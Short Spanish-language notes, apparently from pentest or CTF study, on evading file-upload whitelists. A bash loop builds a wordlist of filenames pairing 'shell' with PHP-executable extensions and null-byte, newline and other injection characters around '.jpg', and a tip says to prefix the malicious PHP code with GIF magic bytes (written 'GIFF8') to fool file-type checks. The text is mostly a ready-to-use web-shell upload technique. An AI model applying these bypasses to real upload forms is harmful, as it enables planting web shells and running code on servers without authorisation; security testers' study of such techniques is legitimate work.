

Generar bash con wordlists para bypassear whitelists:

for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps' '.phtml' '.phar' '.php3' '.phtm'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done


siempre agregar, previo al código malicioso un "tipo de archivo" en base a los magicnumbers:
"
GIFF8
<?php .... ?>
